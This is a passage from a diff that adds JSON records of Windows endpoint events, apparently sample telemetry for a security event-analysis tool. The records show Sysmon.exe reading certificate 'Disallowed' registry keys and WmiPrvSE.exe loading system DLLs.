"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573790890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetTCPIP.dll", + "image_path": "C:\\Windows\\System32\\wbem\\NetTCPIP.dll", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 
131883573790740000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "registry", + "pid": 2680, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573791980000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-001094050200}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + 
"pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wmitomi.dll", + "image_path": "C:\\Windows\\System32\\wmitomi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "mi.dll", + "image_path": "C:\\Windows\\System32\\mi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "miutils.dll", + "image_path": "C:\\Windows\\System32\\miutils.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "NetAdapterCim.dll", + "image_path": "C:\\Windows\\System32\\wbem\\NetAdapterCim.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792140000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 